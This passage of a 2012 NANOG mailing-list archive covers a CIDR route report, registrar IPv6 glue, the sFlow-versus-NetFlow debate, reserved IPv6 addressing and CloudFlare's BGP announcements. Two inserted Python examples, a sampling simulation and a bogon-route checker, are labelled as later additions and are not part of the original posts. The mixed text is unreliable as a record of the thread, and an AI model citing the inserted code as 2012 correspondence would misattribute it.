HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST > 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. > 72.35.224.0/22 AS30097 NUWAVE - NuWave > 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 
> 72.35.232.0/21 AS30097 NUWAVE - NuWave > 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC > 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.115.124.0/23 AS46540 > 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink > 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. > 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. > 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. > 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP > 120.136.17.0/24 AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika > 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street > 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP > 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. > 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 
> 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications > 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) > 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. > 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. > 200.6.49.0/24 AS23148 TERREMARK Terremark > 200.24.73.0/24 AS26061 Equant Colombia > 200.33.40.0/24 AS11172 Alestra, S. de R.L. de C.V. > 200.34.0.0/20 AS6342 Instituto Tecnológico y de Estudios Superiores de Monterrey > 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda > 200.58.248.0/21 AS27849 > 200.75.184.0/21 AS14754 Telgua > 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA > 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA > 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 > 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. > 202.58.113.0/24 AS19161 > 202.83.120.0/21 AS37972 > 202.83.124.0/24 AS37972 > 202.83.125.0/24 AS37972 > 202.83.126.0/24 AS37972 > 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network > 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited > 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd.
> 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia > 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited > 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd > 203.142.219.0/24 AS45149 > 204.9.116.0/22 AS30097 NUWAVE - NuWave > 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications > 204.10.92.0/23 AS30097 NUWAVE - NuWave > 204.10.94.0/23 AS30097 NUWAVE - NuWave > 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. > 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company > 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc > 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc > 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. > 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC > 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 
> 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC
> 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
> 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
> 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications
> 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network
> 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC
> 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd
> 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations
> 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc.
> 216.21.160.0/20 AS27876 American Data Networks
> 216.155.176.0/20 AS16706
> 216.194.160.0/20 AS27876 American Data Networks
>
>
> Please see http://www.cidr-report.org for the full report
>
> ------------------------------------
> Copies of this report are mailed to:
> nanog at nanog.org
> eof-list at ripe.net
> apops at apops.net
> routing-wg at ripe.net
> afnog at afnog.org
>

From merlyn at geeks.org Sat Jul 14 01:06:59 2012
From: merlyn at geeks.org (Doug McIntyre)
Date: Sat, 14 Jul 2012 01:06:59 -0500
Subject: Netsol AAAA glue
In-Reply-To:
References:
Message-ID: <20120714060659.GA46015@geeks.org>

On Fri, Jul 13, 2012 at 08:52:27AM -0400, Jared Mauch wrote:
> On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote:
>
> > So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only received the auto reply.
...
> As long as you're not 1 year into a 10 year renewal, you may want to consider just moving your domains to another registrar such as opensrs.

Drawback of using OpenSRS is they don't do DS records for dnssec, if that's a requirement as well, I believe Dyn has a good service for this (or so I read in the OpenSRS forums).

Not sure why you'd be worried about a 10-year renewal, any registrar transfer just adds on time to the existing expiration, you don't lose anything.

OpenSRS does (now) have online IPv6 glue-record editing.
They can insert DS records by hand if you email into their support department (assuming you are the reseller and you have access to their support department, otherwise you have to work through your reseller). Still, not as nice as online access, but it is workable.

From lukasz at bromirski.net Sat Jul 14 03:30:25 2012
From: lukasz at bromirski.net (Łukasz Bromirski)
Date: Sat, 14 Jul 2012 10:30:25 +0200
Subject: Real world sflow vs netflow?
In-Reply-To:
References:
Message-ID: <50012E21.4060802@bromirski.net>

On 7/13/12 10:20 PM, Peter Phaal wrote:
> 1. NetFlow: Packets are decoded on the router, flow keys are extracted
> and used to lookup/create an entry in a flow cache which is then
> updated based on values in the packet. Records are exported from the
> flow cache in the form of Netflow datagrams when the flow completes or
> based on a timeout.

This is because NetFlow is based on the Flows, where the sFlow name is misleading - it's actually a PACKET monitoring technology, not FLOW monitoring. So the difference in the way both mechanisms work is in line with their definition.

> 2. sFlow: Packets are randomly sampled in hardware and the packet
> headers are immediately exported as sFlow datagrams - there is no flow
> cache on the switch/router.

And that's the biggest problem with sFlow. Packets are sampled, not flows. You may miss the big or important flow, you don't have visibility into every conversation going through the device. sFlow and randomized sampling rely heavily on statistics, but as soon as you agree on that, you'll lose accuracy right away.

> Moving the flow cache off the router has a number of benefits:
> 1. You are no longer limited by the hardware/firmware capabilities of
> the router - your analysis software decides which fields to decode and
> how to accumulate results. For example, if you are managing a mixed
> IPv4/IPv6 environment you can decide to use sFlow to look into v6 over
> v4 and v4 over v6 tunnels (to do the same thing with Netflow would
> likely require a hardware upgrade). You can even feed sFlow into
> Wireshark for detailed analysis of protocols and packet headers.

NetFlow supports IPv6. As well as L2 traffic (v9), MPLS, multicast and so on.

> 2. Operational complexity is greatly reduced since the configuration
> options and resource management issues associated with the flow cache
> are eliminated.

That will depend on the device and the options. It takes around 3-4 commands to configure the export and then one to activate it without any templates on an interface on a Cisco device. What's more important, you can have multiple monitors on one interface monitoring & exporting different sets of traffic to different groups within the company (Security, Network Monitoring, Traffic Engineering). sFlow gives just sampled packets.

> 3. Low latency. Measurements aren't delayed by the flow cache - you
> can detect DDoS attacks/large flows within seconds.

The same with NetFlow. Cache can be actively flushed.

> 4. Scalability - you can turn on sFlow on every link (even 100G
> links), on every device for a comprehensive view of traffic.

Same with NetFlow & sampling turned on.

> However, there are a wide range of Netflow
> sampling implementations, many of which yield questionable results. In
> contrast, the sFlow standard specifies how sampling must be performed
> and ensures that information is included that allows the sampled data
> to be correctly scaled and produce unbiased measurements.

The measurements provided by sFlow are only an approximation of the real traffic and while it may be acceptable on LAN links where details don't matter as much, it's hardly good enough to present a real view on the WAN links. sFlow was built to work on switches and provide "some" accuracy, it's not good enough (unless you do sampling on a 1:5-1:10 basis) to do billing or some detailed analysis of traffic:

http://www.inmon.com/pdf/sFlowBilling.pdf

You can use it to *estimate* the traffic, detect DDoS, sure. But the data & scaling used by sFlow (and additionally tricks used by ASIC vendors implementing it in the hardware) can't change the fundamental difference - sFlow is really sPacket, as it doesn't deal with flows.

NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling accuracy and things like that, but working with flows is more accurate.

-- 
"There's no sense in being precise when | Łukasz Bromirski
 you don't know what you're talking     | jid:lbromirski at jabber.org
 about."            John von Neumann    | http://lukasz.bromirski.net

From swmike at swm.pp.se Sat Jul 14 04:15:30 2012
From: swmike at swm.pp.se (Mikael Abrahamsson)
Date: Sat, 14 Jul 2012 11:15:30 +0200 (CEST)
Subject: Real world sflow vs netflow?
In-Reply-To: <50012E21.4060802@bromirski.net>
References: <50012E21.4060802@bromirski.net>
Message-ID:

On Sat, 14 Jul 2012, Łukasz Bromirski wrote:

> NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling accuracy
> and things like that, but working with flows is more accurate.

If you do 1:1000 sampling with both Netflow and sFlow, why would one of them be more accurate than the other? If you analyze the flow on the device or on the collector (as might be done with sFlow), I don't see why one would be better than the other.
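To make the sampling argument in the two messages above concrete, here is an added example, written for this edit and not code from the thread or from any sFlow or NetFlow implementation. It runs a constructed packet trace (one large flow of small packets, two busy web flows, five hundred short "mouse" flows; all names and counts are made up) through an exact per-flow cache and through 1:N random packet sampling with the usual scaling by N. It shows Łukasz's point that small flows vanish under sampling and Mikael's point that the error on a large flow is governed by the sampling rate, not by which mechanism carries the samples.

```python
import random
from collections import Counter

def build_trace(seed=1):
    """Constructed traffic mix: one large 'attack' flow of 64-byte packets, two
    busy web flows and 500 short 'mouse' flows.
    Returns ({flow: (packets, bytes_per_packet)}, [(flow, size), ...] shuffled)."""
    rng = random.Random(seed)
    flows = {"attack": (100000, 64), "web-a": (3000, 1200), "web-b": (2500, 900)}
    for i in range(500):
        flows[f"mouse-{i}"] = (rng.randint(1, 10), 500)
    packets = []
    for key, (count, size) in flows.items():
        packets.extend([(key, size)] * count)
    rng.shuffle(packets)
    return flows, packets

def flow_cache_bytes(packets):
    """NetFlow-style accounting: every packet updates its flow's cache entry,
    so byte totals are exact and every flow, however small, is seen."""
    totals = Counter()
    for key, size in packets:
        totals[key] += size
    return totals

def sampled_bytes(packets, rate, seed=2):
    """sFlow-style accounting: keep one packet in `rate` at random, export it,
    and let the collector scale each sample by `rate` (an unbiased estimator
    whose variance grows with `rate` and shrinks with the flow's packet count)."""
    rng = random.Random(seed)
    totals = Counter()
    for key, size in packets:
        if rng.randrange(rate) == 0:
            totals[key] += size * rate
    return totals

def relative_error(exact, estimate, key):
    """|estimate - exact| / exact for one flow; a flow never sampled counts as 0."""
    return abs(estimate.get(key, 0) - exact[key]) / exact[key]

def top_flow(totals):
    """Flow with the most bytes, i.e. what a top-talker or DDoS alarm would fire on."""
    return totals.most_common(1)[0][0]

if __name__ == "__main__":
    flows, packets = build_trace()
    exact = flow_cache_bytes(packets)
    for rate in (10, 100, 1000):
        est = sampled_bytes(packets, rate)
        print(f"1:{rate}: flows seen {len(est)}/{len(exact)}, "
              f"attack error {relative_error(exact, est, 'attack'):.1%}, "
              f"top flow {top_flow(est)}")
```

The large flow survives every sampling rate with an error of a few percent, because it contributes hundreds of samples, while most of the mouse flows contribute none and simply disappear from the sampled view; that is the accuracy trade both posters describe, and it is the same trade whether the sampled packets are turned into flows on the router or on the collector.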
-- 
Mikael Abrahamsson    email: swmike at swm.pp.se

From eugen at leitl.org Sat Jul 14 04:44:25 2012
From: eugen at leitl.org (Eugen Leitl)
Date: Sat, 14 Jul 2012 11:44:25 +0200
Subject: The Cidr Report
In-Reply-To:
References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com>
Message-ID: <20120714094425.GV12615@leitl.org>

On Sat, Jul 14, 2012 at 03:48:47AM +1000, Skeeve Stevens wrote:
> I think the effort to moderate this particular list would be far too much
> effort.

Most mailing lists allow moderation of new list members by default. Typically, the moderation is removed after the first non-spam post. This causes negligible workload in general.

From joseph.snyder at gmail.com Sat Jul 14 06:23:15 2012
From: joseph.snyder at gmail.com (joseph.snyder at gmail.com)
Date: Sat, 14 Jul 2012 07:23:15 -0400
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com>
Message-ID: <55022963-48d8-480d-8052-6f6b5f38ee9c@email.android.com>

If it is a hostile lab environment, then pre-decide on the address space to be used by the company and auto-include that into all production routers' policies to drop it like a hot potato covered in lava.

Brandon Ross wrote:

On Fri, 13 Jul 2012, Owen DeLong wrote:

> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>
>> keep life simple. use global ipv6 space.
>>
>> randy
>
> Though it is rare, this is one time when I absolutely agree with Randy.

It's even more rare for me to agree with Randy AND Owen at the same time.
-- 
Brandon Ross                                      Yahoo & AIM:  BrandonNRoss
+1-404-635-6667                                                ICQ:  2269442
Schedule a meeting:  https://tungle.me/bross            Skype:  brandonross

From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Sat Jul 14 06:34:37 2012
From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver)
Date: Sat, 14 Jul 2012 13:34:37 +0200
Subject: CloudFlare IPv6 BGP announcements - WTF guys?
Message-ID: <24418314.De6TB4VHBp@lsdsrv>

So, doing a "sh bgp ipv6 uni 2400:cb00::/32 long" reveals that CloudFlare are currently announcing a bunch of /48s to the rest of the internet through nLayer only - as far as I can see.

Simple suggestion: announce the /32 to the internet from all peering points like good Netizens and then announce your /48s from whatever peering it is you want the traffic sent to and tag it with the NO_EXPORT community attribute so you're not spamming up everyone's tables or hoisting yourselves by your own petard by getting filtered out.

Kind Regards,
Oliver

From randy at psg.com Sat Jul 14 07:22:16 2012
From: randy at psg.com (Randy Bush)
Date: Sat, 14 Jul 2012 21:22:16 +0900
Subject: CloudFlare IPv6 BGP announcements - WTF guys?
In-Reply-To: <24418314.De6TB4VHBp@lsdsrv>
References: <24418314.De6TB4VHBp@lsdsrv>
Message-ID:

> So, doing a "sh bgp ipv6 uni 2400:cb00::/32 long" reveals that
> CloudFlare are currently announcing a bunch of /48s to the rest
> of the internet through nLayer only - as far as I can see.

gossip is cloudflare has most, if not all, eggs in one basket, but a pollute commons routing policy. sad to say, this is not uncommon, just unwise. check for it when they put out the s1.
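As a defender-side check that ties Oliver's suggestion (a covering /32 announced everywhere, the /48s carried with NO_EXPORT) to the "Possible Bogus Routes" section of the report quoted earlier in this digest, here is an added example written for this edit; it is not the cidr-report's code and not anything CloudFlare or nLayer runs. It parses rows in the report's own `prefix ASnum description` layout, flags prefixes inside RFC 1918, RFC 5737 or RFC 2544 space or originated by a private ASN, lists /24 and /48 announcements that no shorter prefix in the table covers (the ones whose traffic has nowhere to go if a peer filters long prefixes), and lists same-origin more-specifics of an aggregate, which is what the report counts as aggregation gain. The sample table reuses rows from the quoted report plus two IPv6 rows under 2400:cb00::/32 with a constructed AS64496 origin (an RFC 5398 documentation ASN); "uncovered" only means uncovered within this partial sample.

```python
import ipaddress

# Address space that should never be originated into the global table:
# RFC 1918 private, RFC 5737 documentation, RFC 2544 benchmarking,
# RFC 4193 ULA, link-local and RFC 3849 IPv6 documentation space.
BOGONS = [ipaddress.ip_network(p) for p in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "192.0.2.0/24", "198.51.100.0/24", "203.0.113.0/24", "198.18.0.0/15",
    "fc00::/7", "fe80::/10", "2001:db8::/32",
)]

# Longest prefix length most operators accept from peers, per address family.
LONGEST = {4: 24, 6: 48}

# Constructed sample: rows copied from the cidr-report listing in this digest,
# plus two IPv6 rows with a placeholder origin AS64496 (RFC 5398 documentation ASN).
SAMPLE_TABLE = """\
10.86.64.32/30 AS65530 -Private Use AS-
198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications
203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications
203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications
203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications
2400:cb00::/32 AS64496 placeholder origin (constructed row)
2400:cb00:1::/48 AS64496 placeholder origin (constructed row)
"""

def is_private_asn(asn):
    """RFC 6996 private-use ASN ranges (16-bit and 32-bit)."""
    return 64512 <= asn <= 65534 or 4200000000 <= asn <= 4294967294

def parse_table(text):
    """Parse 'prefix ASnum [description]' rows into (network, origin_asn) pairs.
    Blank or malformed rows are skipped rather than aborting the whole run."""
    routes = []
    for line in text.strip().splitlines():
        fields = line.split(None, 2)
        if len(fields) < 2 or not fields[1].startswith("AS"):
            continue
        network = ipaddress.ip_network(fields[0], strict=False)
        routes.append((network, int(fields[1][2:])))
    return routes

def _covers(outer, inner):
    """True if `outer` is a strictly shorter prefix of the same family containing `inner`."""
    return (outer.version == inner.version and outer.prefixlen < inner.prefixlen
            and inner.subnet_of(outer))

def bogon_routes(routes):
    """Prefixes inside bogon space or originated by a private ASN."""
    return [(str(p), asn) for p, asn in routes
            if is_private_asn(asn)
            or any(p.version == b.version and p.subnet_of(b) for b in BOGONS)]

def uncovered_more_specifics(routes):
    """/24 (v4) and /48 (v6) announcements with no shorter covering prefix in the
    table: if a peer filters at that length, nothing else delivers their traffic."""
    return [(str(p), asn) for p, asn in routes
            if p.prefixlen == LONGEST[p.version]
            and not any(_covers(q, p) for q, _ in routes)]

def same_origin_deaggregates(routes):
    """More-specifics whose covering aggregate is announced by the same origin AS;
    the cidr-report counts these as aggregation gain (NetGain)."""
    found = []
    for p, asn in routes:
        cover = next((q for q, other in routes if other == asn and _covers(q, p)), None)
        if cover is not None:
            found.append((str(p), str(cover), asn))
    return found

if __name__ == "__main__":
    table = parse_table(SAMPLE_TABLE)
    print("bogons:", bogon_routes(table))
    print("uncovered:", uncovered_more_specifics(table))
    print("deaggregates:", same_origin_deaggregates(table))
```

Run against a full table dump in the same layout, the uncovered list is the one to watch from the receiving side: a /48 that has a covering /32 in the table degrades gracefully when filtered, while one without a covering prefix becomes unreachable, which is the "hoisted by your own petard" case Oliver describes.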
randy

From asullivan at dyn.com Sat Jul 14 09:14:08 2012
From: asullivan at dyn.com (Andrew Sullivan)
Date: Sat, 14 Jul 2012 10:14:08 -0400
Subject: Netsol AAAA glue
In-Reply-To: <20120714060659.GA46015@geeks.org>
References: <20120714060659.GA46015@geeks.org>
Message-ID: <20120714141408.GB94619@dyn.com>

On Sat, Jul 14, 2012 at 01:06:59AM -0500, Doug McIntyre wrote:
> Not sure why you'd be worried about a 10-year renewal, any registrar
> transfer just adds on time to existing expiration, you don't lose anything.

This isn't true in ICANN-contracted registries. The maximum period is 10 years, absolutely, so if you have 10 years to go and you pay for a transfer you lose the additional year's payment.

Best,

A

-- 
Andrew Sullivan
Dyn Labs
asullivan at dyn.com

From valdis.kletnieks at vt.edu Sat Jul 14 10:43:45 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Sat, 14 Jul 2012 11:43:45 -0400
Subject: Netsol AAAA glue
In-Reply-To: Your message of "Sat, 14 Jul 2012 10:14:08 -0400." <20120714141408.GB94619@dyn.com>
References: <20120714060659.GA46015@geeks.org> <20120714141408.GB94619@dyn.com>
Message-ID: <37944.1342280625@turing-police.cc.vt.edu>

On Sat, 14 Jul 2012 10:14:08 -0400, Andrew Sullivan said:
> On Sat, Jul 14, 2012 at 01:06:59AM -0500, Doug McIntyre wrote:
> > Not sure why you'd be worried about a 10-year renewal, any registrar
> > transfer just adds on time to existing expiration, you don't lose anything.
>
> This isn't true in ICANN-contracted registries. The maximum period is
> 10 years, absolutely, so if you have 10 years to go and you pay for a
> transfer you lose the additional year's payment.

Oh, come *on* guys. How much does a bleeping domain *cost*? Under what conditions does "zomg I'm gonna lose the other 9 years" actually outweigh the aggravation?
Either you're paying $8.95 a year, at which point obsessing about it for more than an hour costs more than the domain, or you're paying $100 a year for some premium support that you're obviously not getting - at which point it's obvious you've made a bad business decision and you should cut your losses.

(Yes, I know the *real* problem is getting your business office to issue payment to the new registrar, and then fixing your internal procedures and documentation to match what the new registrar wants. And the other real problem is that the registrar race to the bottom means *none* of them do everything you need/want...)

From lost at l-w.ca Sat Jul 14 11:03:53 2012
From: lost at l-w.ca (William Astle)
Date: Sat, 14 Jul 2012 10:03:53 -0600
Subject: Netsol AAAA glue
In-Reply-To: <37944.1342280625@turing-police.cc.vt.edu>
References: <20120714060659.GA46015@geeks.org> <20120714141408.GB94619@dyn.com> <37944.1342280625@turing-police.cc.vt.edu>
Message-ID: <50019869.4080808@l-w.ca>

On 12-07-14 09:43 AM, valdis.kletnieks at vt.edu wrote:
> On Sat, 14 Jul 2012 10:14:08 -0400, Andrew Sullivan said:
>> This isn't true in ICANN-contracted registries. The maximum period is
>> 10 years, absolutely, so if you have 10 years to go and you pay for a
>> transfer you lose the additional year's payment.
>
> Oh, come *on* guys. How much does a bleeping domain *cost*? Under what
> conditions does "zomg I'm gonna lose the other 9 years" actually outweigh the
> aggravation?

You don't lose the other 9 years. You just don't get an 11th year if the new renewal date would then be more than 10 years out.

For what it's worth, .ca (non-ICANN) works the same way.
From jerome at ceriz.fr Sat Jul 14 11:08:40 2012
From: jerome at ceriz.fr (Jérôme Nicolle)
Date: Sat, 14 Jul 2012 18:08:40 +0200
Subject: using "reserved" IPv6 space
In-Reply-To: <500032E4.40804@gmail.com>
References: <500032E4.40804@gmail.com>
Message-ID: <50019988.5080108@ceriz.fr>

On 13/07/12 16:38, -Hammer- wrote:
> In the past, with IPv4, we have used reserved or "non-routable"

I guess "non-routable IPv4" translates well to "non-routable IPv6", thus putting Link-Local addresses on top of the list.

Though you may use the auto-configured addresses for that purpose, you also may set LLAs to your liking. I use fe80::zone_ID:interface_ID, and set such an LLA on every gateway to make routing tables more legible, those IDs being arbitrary 16-bit values.

Any other address class will work well, but I'd rather not use reserved space outside of GUA, ULA or LLA scopes to avoid bug-hunting on poorly implemented IPv6 stacks.

-- 
Jérôme Nicolle
+33 6 19 31 27 14

From owen at delong.com Sat Jul 14 11:18:48 2012
From: owen at delong.com (Owen DeLong)
Date: Sat, 14 Jul 2012 09:18:48 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <50019988.5080108@ceriz.fr>
References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr>
Message-ID: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com>

On Jul 14, 2012, at 9:08 AM, Jérôme Nicolle wrote:

> On 13/07/12 16:38, -Hammer- wrote:
>> In the past, with IPv4, we have used reserved or "non-routable"
>
> I guess "non-routable IPv4" translates well to "non-routable IPv6", thus
> putting Link-Local addresses on top of the list.
>
> Though you may use the auto-configured addresses for that purpose, you
> also may set LLAs to your liking. I use fe80::zone_ID:interface_ID, and
> set such an LLA on every gateway to make routing tables more legible,
> those IDs being arbitrary 16-bit values.
>

Given that zone_IDs in my environments consist of terms like:

fxp0
en0
eth0
ge-0/0/0.0
etc.
How, exactly, would you turn those into part of an IPv6 address?

> Any other address class will work well, but I'd rather not use reserved
> space outside of GUA, ULA or LLA scopes to avoid bug-hunting on poorly
> implemented IPv6 stacks.

+1

However, I still think GUA is the best, most flexible choice.

Owen

From lukasz at bromirski.net Sat Jul 14 12:15:58 2012
From: lukasz at bromirski.net (Łukasz Bromirski)
Date: Sat, 14 Jul 2012 19:15:58 +0200
Subject: Real world sflow vs netflow?
In-Reply-To:
References: <50012E21.4060802@bromirski.net>
Message-ID: <5001A94E.20703@bromirski.net>

On 7/14/12 11:15 AM, Mikael Abrahamsson wrote:
> On Sat, 14 Jul 2012, Łukasz Bromirski wrote:
>
>> NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling
>> accuracy and things like that, but working with flows is more accurate.
>
> If you do 1:1000 sampling with both Netflow and sFlow, why would one of
> them be more accurate than the other? If you analyze the flow on the
> device or on the collector (as might be done with sFlow), I don't see
> why one would be better than the other.

Sure, but with sampling you'll lose accuracy anyway. The difference is subtle, and depends on the (Net|j)Flow implementation - on some devices for sampled NetFlow you'll still get sampled FLOWS (1:x) not sampled PACKETS (thus disregarding the flow advantage).

-- 
"There's no sense in being precise when | Łukasz Bromirski
 you don't know what you're talking     | jid:lbromirski at jabber.org
 about."            John von Neumann    | http://lukasz.bromirski.net

From shrdlu at deaddrop.org Sat Jul 14 13:07:08 2012
From: shrdlu at deaddrop.org (Lynda)
Date: Sat, 14 Jul 2012 11:07:08 -0700
Subject: Calling Geoff Huston (was Re: The REAL Cidr Report)
In-Reply-To:
References: <201207132200.q6DM00xM047173@wattle.apnic.net>
Message-ID: <5001B54C.4000804@deaddrop.org>

I changed the subject header on this since I'm quite sure most folks ignored it due to the "problem" emails.
Not only was this one off (and late by a few hours), but I never saw a sign that the BGP report was even sent (and it's not in the archives, either).

On 7/13/2012 10:52 PM, Patrick W. Gilmore wrote:
> Composed on a virtual keyboard, please forgive typos.
> On Jul 13, 2012, at 22:00, cidr-report at potaroo.net wrote:
>> This report has been generated at Fri Jul 13 21:10:00 2012 AEST.
>> The report analyses the BGP Routing Table of AS2.0 router
>> and generates a report on aggregation potential within the table.
>>
>> Check http://www.cidr-report.org for a current version of this report.
>> Recent Table History
>> Date Prefixes CIDR Agg
>> 06-07-12 418603 242444
>> 07-07-12 418670 242326
>> 08-07-12 418651 242260
>> 09-07-12 417976 242235
>> 10-07-12 418251 242235
>> 11-07-12 0 242235
>> 12-07-12 0 242235
>> 13-07-12 0 242235
>
> Ahhh, oops?
>
> Geoff, might want to check your scripts.

Yep. BCC to Geoff, also, just in case.

-- 
Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs.

From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Sat Jul 14 14:49:48 2012
From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver)
Date: Sat, 14 Jul 2012 21:49:48 +0200
Subject: using "reserved" IPv6 space
